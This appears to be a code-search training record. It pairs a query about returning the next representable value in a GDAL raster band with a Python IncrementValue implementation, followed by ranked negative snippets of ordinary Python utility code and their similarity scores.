[ "0.7944226", "0.7944226", "0.7937631", "0.78972983", "0.7884411", "0.78611416", "0.7846386", "0.7778144", "0.77733576", "0.7762124", "0.7680303", "0.7642864", "0.75792414", "0.75792414", "0.75784636", "0.7551094", "0.75474113", "0.75474113", "0.7521111", "0.7521111", "0.74849975", "0.7484885", "0.7471194", "0.7461117", "0.74487036", "0.7446084", "0.744392", "0.74194586", "0.7393505", "0.7390895", "0.73744524", "0.73744524", "0.73413813", "0.7310355", "0.7296167", "0.7289322", "0.7249265", "0.7248786", "0.72440404", "0.7236522", "0.7224943", "0.72162694", "0.72142404", "0.7209117", "0.71570104", "0.7145454", "0.714173", "0.71323127", "0.7109216", "0.70772934", "0.70617133", "0.70600265", "0.70433307", "0.7028071", "0.70215166", "0.70111954", "0.6988008", "0.69834995", "0.6979648", "0.6968356", "0.69448626", "0.694202", "0.69383395", "0.69209516", "0.6905302", "0.6903685", "0.6900909", "0.6896162", "0.6874685", "0.6870821", "0.6850932", "0.68279237", "0.6827528", "0.6824322", "0.68122953", "0.68122953", "0.68073714", "0.68069035", "0.6802727", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67963773", "0.67865294", "0.67865294", "0.67865294", "0.67865294", "0.67847824", "0.67812485", "0.6780029", "0.6770788", "0.6767305", "0.6761661", "0.67479265", "0.6722724", "0.67219627" ]
0.0
-1
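Mirroring that record, the MaximumValue property reads the upper bound from numpy.iinfo for integer dtypes and returns numpy.inf for floating-point dtypes. A quick check of the concrete bounds for dtypes commonly paired with GDAL band types (the Byte/Int16/UInt16 pairings in the comments are the usual ones, stated here as an assumption):

import numpy

print(numpy.iinfo(numpy.uint8).max)    # 255   (GDAL Byte)
print(numpy.iinfo(numpy.int16).max)    # 32767 (GDAL Int16)
print(numpy.iinfo(numpy.uint16).max)   # 65535 (GDAL UInt16)
# Floats do have a finite ceiling, but MaximumValue reports inf instead:
print(numpy.finfo(numpy.float32).max)  # about 3.4028235e+38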
Returns the next `value` expressible in this band
def IncrementValue(self, value): datatype = self.NumPyDataType if issubclass(datatype, numpy.integer): if not isinstance(value, (int, numpy.integer)): raise TypeError( 'value {0!r} must be compatible with {1}'.format( value, datatype.__name__ ) ) iinfo = numpy.iinfo(datatype) minint, maxint = iinfo.min, iinfo.max if not minint <= value <= maxint: raise ValueError( 'value {0!r} must be between {1} and {2}'.format( value, minint, maxint ) ) if value == maxint: return maxint return value + 1 elif issubclass(datatype, numpy.floating): if not isinstance(value, (int, numpy.integer, float, numpy.floating)): raise TypeError( "value {0!r} must be compatible with {1}".format( value, datatype.__name__ ) ) if value == numpy.finfo(datatype).max: return numpy.inf return numpy.nextafter(datatype(value), datatype(numpy.inf)) else: raise TypeError("Cannot handle DataType: {0}".format(datatype))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_next(self) -> float:\n return self._current + self._offset", "def get_next(self) -> int:\n return self._current * self._step + self._offset", "def value(self):\n current_value = self.initial_value * self.schedule(self.step / self.nvalues)\n self.step += 1.\n return current_value", "def get_next():\n return \"some_value\"", "def get_next(self):\n\t\tassert(len(self.past_values) < 256**3)\n\t\twhile self.advance_state() in self.past_values:\n\t\t\tpass\n\t\tself.past_values.add(self.state)\n\t\treturn self.state", "def nextVal(self, n):\n stream = self.stream\n\n stream.append(n) # appends on the right\n\n streamlength = len(stream)\n if streamlength > self.period:\n stream.popleft()\n streamlength -= 1\n if streamlength == 0:\n self.value = 0\n else:\n self.value = sum( stream ) / float( streamlength )\n\n return self.value", "def peek(self):\n return self.next_val", "def get_next(current):\n return 0.5 * (current + n / current)", "def next(self) -> int:\n node = self.stack.pop()\n ans = node.val \n self._sink(node.right)\n return ans", "def next_value(self):\n self._lock.acquire()\n try:\n id = self._next_id\n self._next_id += 1\n finally:\n self._lock.release()\n return id", "def next(self) -> int:\n value = self.inorder[self.index]\n self.index = self.index + 1\n return value", "def next(self):\n return self.cycle.next()", "def get_next(self) -> int:\n cur_next = self._bin_iter.get_next()\n\n return self._intvs.get_next(cur_next, self.even)", "def get_next(self):\n try:\n return self.the_input[self.index]\n except IndexError:\n return None", "def find_next(self, v):\n if v + 1 < self.values[0] or v + 1 > self.values[-1]:\n raise IndexError('element not found')\n\n index = self._bin_search_recursive(v, 0, len(self.values) - 1)\n\n if index < len(self.values) - 1:\n return self.values[index + 1]\n else:\n raise IndexError('element not found')", "def next(self):\n if self.signbit.dec_value == 1:\n method = 'prev'\n else:\n method = 'next'\n return self._step(method)", "def propose_next(self):\n if self._nvalue > 1 and not self.frozen:\n self._proposednextindex = random_walk_nextindex(\n self._currentindex, self._nvalue, neighborhoods=self._neighborhoods)\n else:\n self._proposednextindex = self._currentindex\n return self.values[self._proposednextindex]", "def first_value(self):\n return self._start", "def _value(self):\n return self.device.value(*self._id[1:])", "def __next__(self):\n if self._current is None:\n raise StopIteration()\n else:\n answer = self._current # hold prev value of _current\n self._advance() # update _current to next value in the\n #progression\n return answer", "def value(self):\n return self.head", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def next(self) -> int:\n self.idx += 1\n return self.m[self.idx]", "def __next__(self):\n\n # pointer is the current value\n # counter is an item next to pointer\n # take value from pointer position and reduce\n # counter until counter is not 0\n # if counter == 0 move pointer to the next position\n # with value (stride=2)\n if self.counter <= 0:\n # move pointer to the next item\n self.pointer += 2\n try:\n # take counter\n self.counter = self.data[self.pointer + 1]\n except IndexError:\n raise StopIteration\n\n # take value from pointer position and reduce counter\n value = self.data[self.pointer]\n self.counter -= 1\n\n return value", "def nextValue( self, connection ):\n\t\tif getattr(self.schema,'defaultValue',None):\n\t\t\tfor row in sqlquery.SQLQuery(\n\t\t\t\t\"\"\"SELECT 
%(value)s\"\"\"\n\t\t\t)( connection, value = self.schema.defaultValue ):\n\t\t\t\treturn row[0]\n\t\tif getattr(self.schema,'sequenceName',None):\n\t\t\t# this is postgresql specific\n\t\t\tfor row in sqlquery.SQLQuery(\n\t\t\t\t\"\"\"SELECT nextval(%%(sequenceName)s)\"\"\"\n\t\t\t)( connection, sequenceName = self.schema.sequenceName ):\n\t\t\t\treturn row[0]\n\t\traise AttributeError(\n\t\t\t\"\"\"Sorry, don't seem to have a default value or sequence name for %s\"\"\"%(\n\t\t\t\tself.schema.name,\n\t\t\t)\n\t\t)", "def first_value(self):\n return self._value", "def next(self):\n if self.pointer > len(self.queue) - 1:\n self.pointer = 0\n raise StopIteration\n val = self.queue[self.pointer]\n self.pointer += 1\n return val", "def next(self):\n return self.from_date(self.date_b)", "def next(self):\n return self.my_next", "def get(self, index: int) -> int:\n if index + 1 >self.cnt:\n return -1\n\n tmp = self.dummy\n for i in range(index+1):\n tmp = tmp.next\n return tmp.val", "def get_next(self):\n return self.next", "def get_next(self):\n return self.next", "def next(self) -> int:\n node = self.stack.pop()\n self.push_lefts(node.right)\n return node.val", "def value(self):\n if hasattr(self, '_m_value'):\n return self._m_value if hasattr(self, '_m_value') else None\n\n self._m_value = (((((((self.groups[0].value + ((self.groups[1].value << 7) if self.len >= 2 else 0)) + ((self.groups[2].value << 14) if self.len >= 3 else 0)) + ((self.groups[3].value << 21) if self.len >= 4 else 0)) + ((self.groups[4].value << 28) if self.len >= 5 else 0)) + ((self.groups[5].value << 35) if self.len >= 6 else 0)) + ((self.groups[6].value << 42) if self.len >= 7 else 0)) + ((self.groups[7].value << 49) if self.len >= 8 else 0))\n return self._m_value if hasattr(self, '_m_value') else None", "def __next__(self):\n if self.returned >= len(self):\n raise StopIteration\n else:\n val = self.buffer[self.current]\n self.current = (self.current + 1) % len(self.buffer)\n self.returned += 1\n return val", "def value(self, step):\n raise NotImplementedError", "def getNext(self):\n\t\t\treturn self.next", "def first_value(self):\n if not self.is_empty():\n return self.data[self.head]\n return None", "def next(self):\n self.lock.acquire()\n self.count += self.step;\n result = self.count\n self.lock.release()\n return result", "def Value(self) -> _n_0_t_14:", "def first_value(self):\n return 0", "def getNext(self):", "def __next__(self):\n self._iteration_index += 1\n if self._iteration_index < self._length:\n return self._child_values[self._iteration_index]\n raise StopIteration", "def next(self, _event):\n self.set_val(self.val + 1)", "def next(self):\n temp = self.n\n try:\n self.n = next(self.g)\n except Exception as e:\n self._hasNext = False\n return temp", "def value_at(self, index):\n if index==0:\n return self.head.val\n\n temp_node = self.head\n for _ in range(index):\n temp_node = temp_node.next\n return temp_node.val", "def getNextValue(self):\n\n if self.si >= len(self.str):\n return -1\n\n # First, count the number of zero chunks until we come to a nonzero chunk.\n zeroCount = 0\n b = ord(self.str[self.si])\n if self.zero_expands:\n bmask = (1 << self.n) - 1\n bv = b & (bmask << (self.bi - self.n))\n while bv == 0:\n zeroCount += 1\n self.bi -= self.n\n if self.bi <= 0:\n self.si += 1\n self.bi = 8\n if self.si >= len(self.str):\n return -1\n\n b = ord(self.str[self.si])\n bv = b & (bmask << (self.bi - self.n))\n\n # Infer from that the number of chunks, and hence the number\n # of bits, that make up the 
value we will extract.\n numChunks = (zeroCount + 1)\n bitCount = numChunks * self.n\n\n # OK, now we need to extract the next bitCount bits into a word.\n result = 0\n while bitCount >= self.bi:\n mask = (1 << self.bi) - 1\n value = (b & mask)\n result = (result << self.bi) | value\n bitCount -= self.bi\n\n self.si += 1\n self.bi = 8\n if self.si >= len(self.str):\n b = 0\n break\n\n b = ord(self.str[self.si])\n\n if bitCount > 0:\n # A partial word in the middle of the byte.\n bottomCount = self.bi - bitCount\n assert bottomCount > 0\n mask = ((1 << bitCount) - 1)\n value = ((b >> bottomCount) & mask)\n result = (result << bitCount) | value\n self.bi -= bitCount\n\n return result", "def getNext(self):\n return self.__next", "def get_next(self):\n return self._next_previous_helper('next')", "def get_next(self):\n return self.cur_node.next.data", "def next(self):\n node = self.stack.pop()\n self.pushLeft(node.right)\n return node.val", "def next(self) -> int:\n while (self.stack or self.node):\n if self.node:\n self.stack.append(self.node)\n self.node = self.node.left\n else:\n self.node = self.stack.pop()\n res = self.node.val\n self.node = self.node.right\n return res", "def next(self) -> int:\n node = self.stack.pop()\n if node.right:\n self.leftMost(node.right)\n \n return node.val", "def __next__(self) -> object:\n if not self.current_node:\n raise StopIteration\n\n current_node_value = self.current_node.value()\n self.current_node = self.current_node.next()\n return current_node_value", "def first_value(self):\n return self.samples[0]", "def values(self):\n while True:\n try:\n yield self.value\n except GPIODeviceClosed:\n break", "def get_next_keystream_value(deck_of_cards):\n get_big_joker_value(deck_of_cards)\n get_small_joker_value(deck_of_cards)\n move_small_joker(deck_of_cards)\n move_big_joker(deck_of_cards)\n triple_cut(deck_of_cards)\n insert_top_to_bottom(deck_of_cards)\n keystream_value = get_card_at_top_index(deck_of_cards)\n \n if keystream_value == get_big_joker_value(deck_of_cards) or \\\n keystream_value == get_small_joker_value(deck_of_cards):\n keystream_value = get_next_keystream_value(deck_of_cards)\n return keystream_value\n\t\n # Condition where if keystream_value is equal to big_joker_value or\n # small_joker_value then this will be repeated. After occuring it is then \n # checked again to see if keystream_value is equal to big_joker_value or\n # small_joker_value. 
If so, then again repeated until not so.", "def get_next_sample(self):", "def peg(self):\n return self._val", "def read(self):\n return self.comp.getNextValue()", "def get_flow_value(self):\n valve = self.valve\n if isinstance(valve, (float, int)):\n flow_val = valve\n elif isinstance(valve, Iterable):\n flow_val = next(valve)\n else:\n raise NotImplementedError(f\"Flow value for valve type {type(valve)} not implemented\")\n return flow_val", "def first_value(self):\n return self._waveforms[0].first_value", "def get(self, index):\n if index < 0 or index >= self.length:\n return -1\n curr = self.head\n for i in range(1, index + 1):\n curr = curr.next\n return curr.val", "def next(self):\n return self._next", "def step(self):\n try:\n return next(self.generator)\n except StopIteration:\n return None", "def get_current_value(self):\n assert(self.is_started())\n return self.currValue", "def next(self) -> int:\n top = self.stack.pop()\n temp = top.right;\n while temp:\n self.stack.append(temp)\n temp = temp.left\n\n return top.val", "def next_candidate():\r\n candidate_bidder = -1\r\n candidate_value = -1\r\n for n in range(len(bidders)):\r\n if (is_active[n] == 0 and cur_value(n) is not None\r\n and cur_value(n) > max(candidate_value, cur_bid)):\r\n candidate_value = bidders[n].values[cur_value_idx[n]]\r\n candidate_bidder = n\r\n return candidate_value, candidate_bidder", "def get(self, index):\n count = 0\n x = self.begin\n\n while count != index:\n x = x.next\n count += 1\n\n return x.value", "def get_next(self):\n try:\n g = next(self.__gnext)\n except StopIteration:\n return None\n\n return g", "def __getitem__(self, value) -> Node:\n self.value = value\n self.next_value = None\n if value in map(lambda x: x.value, self.nodes):\n return value\n\n else:\n return False", "def next(self) -> int:\n node = self.list.pop()\n t = node.right\n while (t):\n self.list.append(t)\n t = t.left\n\n return node.val", "def _get_value(self):\n \n return self._value", "def dereference_value(self, value: int) -> int:\n if self.is_register(value):\n return self[value]\n\n return value", "def lazy_value(self):\n\n if self.state == Node.State.VALID:\n return self.value\n else:\n return None", "def get_next_signal(self):\n row, col = -1, -1\n while row == -1 and col == -1:\n row, col = self.do_polling()\n sleep(10/1000)\n return self.get_symbol(row, col)", "def get_next_parameter(self, name, value, settings, id=0):\n return None", "def value(t):\r\n return t(0)", "def next(self) -> int:\n top = self.stack.pop()\n if top.right:\n t = top.right\n while t:\n self.stack.append(t)\n t = t.left\n return top.val", "def next(self) -> object:\n return self._next", "def next(self, initial):", "def get_next(self, buf):\n if buf is None:\n return None, None, None\n err = _ffi.new(\"JError_t *\")\n p = _cjudy.JudySLNext(self._array[0], buf, err)\n return self._cast(buf, err, p)", "def getNext(self):\n return self.__next__", "def next(self):\r\n rnd = rand() * self.totals[(-1)]\r\n return bisect.bisect_right(self.totals, rnd)", "def __next__(self):\n\t\treturn next()", "def _next_interval(self):\n return self.interval_generator()", "def next(self) -> int:\n self.index += 1\n return self.nodes_sorted[self.index]", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def getValue(self, state):\n return self.values[state]", "def get(self, index):\n if index < 0 or index >= self._size:\n return -1\n\n current = self._head\n for _ in range(index):\n 
current = current.next\n return current.val", "def get_next_if_any(self):\n try:\n ret = self.work[deepcopy(self.i)]\n self.i += 1\n # print \"Trickling item\", self.i\n return ret\n except Exception:\n return None", "def latestValue(self):\n if len(self.values) > 0:\n return self.values[-1]\n else:\n return 0", "def getValue(self) -> int:\n ...", "def next(self):\n n, self.iter = self.nums[self.iter], self.iter+1\n return n", "def value(self):\n return _osgAnimation.SwigPyIterator_value(self)", "def _get_value(self):\n return self.__value", "def value(self):\n if hasattr(self, '_m_value'):\n return self._m_value if hasattr(self, '_m_value') else None\n\n self._m_value = (self.b & 127)\n return self._m_value if hasattr(self, '_m_value') else None", "def get(self, index):\n if index >= self.len:\n return -1\n p = self.head.next\n while index > 0:\n index -= 1\n p = p.next\n return p.val", "def next(self):\n return next(self.gen)" ]
[ "0.69069135", "0.6903918", "0.68510103", "0.6794112", "0.6782542", "0.66370076", "0.66035736", "0.65092635", "0.6481222", "0.6430199", "0.6414499", "0.6410997", "0.63769144", "0.63592046", "0.63583064", "0.63552517", "0.63462645", "0.63152736", "0.6294821", "0.62673527", "0.62468565", "0.62436676", "0.62436676", "0.62214273", "0.6199272", "0.6186351", "0.61850303", "0.6164596", "0.61604047", "0.6148999", "0.61227494", "0.61227494", "0.6120474", "0.6105034", "0.6093133", "0.6081499", "0.60768473", "0.6039049", "0.6034145", "0.60310954", "0.6006239", "0.5993654", "0.59921926", "0.59907025", "0.59854513", "0.5982865", "0.5982694", "0.5981716", "0.59811467", "0.59754896", "0.5967847", "0.5945388", "0.5940692", "0.5926408", "0.5921525", "0.5920828", "0.59208125", "0.591883", "0.59175825", "0.5917147", "0.59075195", "0.589737", "0.58773345", "0.5871988", "0.5871504", "0.58639276", "0.5853242", "0.58406776", "0.58404326", "0.58304346", "0.58259296", "0.58254045", "0.581069", "0.5802216", "0.58016706", "0.57952255", "0.5793001", "0.57927775", "0.5792605", "0.5785569", "0.57830656", "0.5766482", "0.57641965", "0.57547677", "0.5742776", "0.5741573", "0.57335067", "0.5731173", "0.5731173", "0.5731173", "0.5724478", "0.57240343", "0.57191503", "0.57187617", "0.5717772", "0.57150465", "0.5712302", "0.5705474", "0.5705355", "0.5693724", "0.5683531" ]
0.0
-1
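The floating-point branch of IncrementValue above relies on numpy.nextafter, which returns the next representable float in the direction of its second argument, while integer values saturate at their dtype maximum. A small illustration (the float64 values shown are exact):

import numpy

# Next representable double after 1.0, stepping toward +inf:
print(numpy.nextafter(1.0, numpy.inf))  # 1.0000000000000002

# IncrementValue maps the largest finite float of the band's dtype to inf:
print(numpy.finfo(numpy.float64).max)   # 1.7976931348623157e+308

# Integer bands saturate: per the record above, incrementing the dtype
# maximum returns that same maximum (e.g. 255 stays 255 for uint8).
print(numpy.iinfo(numpy.uint8).max)     # 255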
Opens a GDAL-readable file. Raises a GdalError if inputfile is invalid.
def __init__(self, inputfile, mode=GA_ReadOnly): # Open the input file and read some metadata open(inputfile, 'r').close() # HACK: GDAL gives a useless exception if not isinstance(inputfile, bytes): inputfile = inputfile.encode('utf-8') try: # Since this is a SWIG object, clone the ``this`` pointer self.this = gdal.Open(inputfile, mode).this except RuntimeError as e: raise GdalError(str(e)) # Shadow for metadata so we can overwrite it without saving # it to the original file. self._geotransform = None self._rastersizes = None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load(self):\r\n\r\n #Open the dataset read only using GDAL\r\n dataset = gdal.Open(self.inputds, gdal.GA_ReadOnly)\r\n \r\n return dataset\r\n \r\n\r\n #print \"Failed to open %s. Is it a GDAL supported format?\" %(self.inputds)\r", "def open_input(self):\n gdal.AllRegister()\n\n self.out_drv = gdal.GetDriverByName(self.tiledriver)\n self.mem_drv = gdal.GetDriverByName('MEM')\n\n if not self.out_drv:\n raise Exception(\"The '%s' driver was not found, is it available in this GDAL build?\",\n self.tiledriver)\n if not self.mem_drv:\n raise Exception(\"The 'MEM' driver was not found, is it available in this GDAL build?\")\n\n # Open the input file\n\n if self.input_file:\n input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print(\"Input file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n if not input_dataset:\n # Note: GDAL prints the ERROR message too\n exit_with_error(\"It is not possible to open the input file '%s'.\" % self.input_file)\n\n # Read metadata from the input file\n if input_dataset.RasterCount == 0:\n exit_with_error(\"Input file '%s' has no raster band\" % self.input_file)\n\n if input_dataset.GetRasterBand(1).GetRasterColorTable():\n exit_with_error(\n \"Please convert this file to RGB/RGBA and run gdal2tiles on the result.\",\n \"From paletted file you can create RGBA file (temp.vrt) by:\\n\"\n \"gdal_translate -of vrt -expand rgba %s temp.vrt\\n\"\n \"then run:\\n\"\n \"gdal2tiles temp.vrt\" % self.input_file\n )\n\n in_nodata = setup_no_data_values(input_dataset, self.options)\n\n if self.options.verbose:\n print(\"Preprocessed file:\",\n \"( %sP x %sL - %s bands)\" % (input_dataset.RasterXSize,\n input_dataset.RasterYSize,\n input_dataset.RasterCount))\n\n in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)\n\n self.out_srs = setup_output_srs(in_srs, self.options)\n\n # If input and output reference systems are different, we reproject the input dataset into\n # the output reference system for easier manipulation\n\n self.warped_input_dataset = None\n\n if self.options.profile in ('mercator', 'geodetic'):\n\n if not in_srs:\n exit_with_error(\n \"Input file has unknown SRS.\",\n \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\")\n\n if not has_georeference(input_dataset):\n exit_with_error(\n \"There is no georeference - neither affine transformation (worldfile) \"\n \"nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2tiles with parameter -p 'raster' or use another GIS \"\n \"software for georeference e.g. 
gdal_transform -gcp / -a_ullr / -a_srs\"\n )\n\n if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or\n (input_dataset.GetGCPCount() != 0)):\n self.warped_input_dataset = reproject_dataset(\n input_dataset, in_srs, self.out_srs)\n\n if in_nodata:\n self.warped_input_dataset = update_no_data_values(\n self.warped_input_dataset, in_nodata, options=self.options)\n else:\n self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(\n self.warped_input_dataset, options=self.options)\n\n if self.warped_input_dataset and self.options.verbose:\n print(\"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (\n self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize,\n self.warped_input_dataset.RasterCount))\n\n if not self.warped_input_dataset:\n self.warped_input_dataset = input_dataset\n\n #Salva o arquivo reprojetado\n self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,\n self.warped_input_dataset)\n\n # Get alpha band (either directly or from NODATA value)\n self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()\n self.dataBandsCount = nb_data_bands(self.warped_input_dataset)\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print(\"KML autotest OK!\")\n\n # Read the georeference\n self.out_gt = self.warped_input_dataset.GetGeoTransform()\n\n # Test the size of the pixel\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0, 0):\n exit_with_error(\"Georeference of the raster contains rotation or skew. \"\n \"Such raster is not supported. 
Please use gdalwarp first.\")\n\n # Here we expect: pixel is square, no rotation on the raster\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n\n if self.options.verbose:\n print(\"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)\n\n # Calculating ranges for tiles in different zoom levels\n if self.options.profile == 'mercator':\n\n self.mercator = GlobalMercator()\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz is None:\n self.tminz = self.mercator.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\",\n self.mercator.MetersToLatLon(self.ominx, self.ominy),\n self.mercator.MetersToLatLon(self.omaxx, self.omaxy))\n print('MinZoomLevel:', self.tminz)\n print(\"MaxZoomLevel:\",\n self.tmaxz,\n \"(\",\n self.mercator.Resolution(self.tmaxz),\n \")\")\n\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic(self.options.tmscompatible)\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, 32))\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)\n tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tminz is None:\n self.tminz = self.geodetic.ZoomForPixelSize(\n self.out_gt[1] *\n max(self.warped_input_dataset.RasterXSize,\n self.warped_input_dataset.RasterYSize) /\n float(self.tilesize))\n\n # Get the maximal zoom level\n # (closest possible zoom level up on the resolution of raster)\n if self.tmaxz is None:\n self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])\n\n if self.options.verbose:\n print(\"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy)\n\n if self.options.profile == 'raster':\n\n def log2(x):\n return math.log10(x) / 
math.log10(2)\n\n self.nativezoom = int(\n max(math.ceil(log2(self.warped_input_dataset.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.warped_input_dataset.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print(\"Native zoom of the raster:\", self.nativezoom)\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz is None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz is None:\n self.tmaxz = self.nativezoom\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = list(range(0, self.tmaxz+1))\n self.tsize = list(range(0, self.tmaxz+1))\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1\n tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n ct = osr.CoordinateTransformation(in_srs, srs4326)\n\n def rastertileswne(x, y, z):\n pixelsizex = (2**(self.tmaxz-z) * self.out_gt[1]) # X-pixel size in level\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = ct.TransformPoint(west, south)[:2]\n east, north = ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa", "def open_image(filename):\n\n dataset = gdal.Open(filename, gdal.GA_ReadOnly)\n if dataset is None:\n raise IOError(\"cannot open %s\" % filename)\n\n return GdalImage(dataset, filename)", "def open_input(self):\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"YES\")\n gdal.AllRegister()\n # self.options.verbose=True\n if self.options.tms_osm:\n self.s_y_type=\"osm\"\n else:\n self.s_y_type=\"tms\"\n if self.options.verbose:\n print \"open_input :\", self.input,\" osm[\",self.options.tms_osm,\",\",self.s_y_type,\"] mbtiles[\",self.options.mbtiles,\"] mbtiles_todisk[\",self.options.mbtiles_todisk,\"] mbtiles_fromdisk[\",self.options.mbtiles_fromdisk,\"]\";\n # Open the input file\n if self.input:\n self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print \"Input file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n if not self.in_ds:\n # Note: GDAL prints the ERROR message too\n self.error(\"It is not possible to open the input file '%s'.\" % self.input )\n\n # Read metadata from the input file\n if self.in_ds.RasterCount == 0:\n self.error( \"Input file '%s' has no raster band\" % self.input )\n\n if self.in_ds.GetRasterBand(1).GetRasterColorTable():\n # TODO: Process directly paletted dataset by generating VRT in memory\n self.error( \"Please convert this file to RGB/RGBA and run gdal2mbtiles on the result.\",\n \"\"\"From paletted file you can create RGBA file (temp.vrt) by:\ngdal_translate -of vrt -expand rgba %s temp.vrt\nthen run:\ngdal2mbtiles temp.vrt\"\"\" % self.input )\n\n # Get NODATA value\n # User supplied values overwrite everything else.\n if self.options.srcnodata is not None:\n nds = 
map(float, self.options.srcnodata.split(','))\n if len(nds) < self.in_ds.RasterCount:\n self.in_nodata = (nds * self.in_ds.RasterCount)[:self.in_ds.RasterCount]\n else:\n self.in_nodata = nds\n else:\n # If the source dataset has NODATA, use it.\n self.in_nodata = []\n for i in range(1, self.in_ds.RasterCount+1):\n if self.in_ds.GetRasterBand(i).GetNoDataValue() != None:\n self.in_nodata.append( self.in_ds.GetRasterBand(i).GetNoDataValue() )\n\n if self.options.verbose:\n print \"NODATA: %s\" % self.in_nodata\n\n # INIT DEST\n if self.options.init_dest is not None:\n if self.options.tile_format == \"jpeg\":\n if self.in_ds.RasterCount == 4:\n nbands = 3\n else:\n nbands = self.in_ds.RasterCount\n\n nds = map(float, self.options.init_dest.split(','))\n\n if len(nds) == 1:\n init_dest = nds * nbands\n elif len(nds) == nbands:\n init_dest = nds\n else:\n print \"WARNING: you suplied %d '--init-dest' values but the dataset has %d data bands\" % (len(nds), nbands)\n init_dest = None\n else:\n init_dest = None\n print \"WARNING: --init-dest can be used only with 'jpeg' tile format\"\n else:\n if 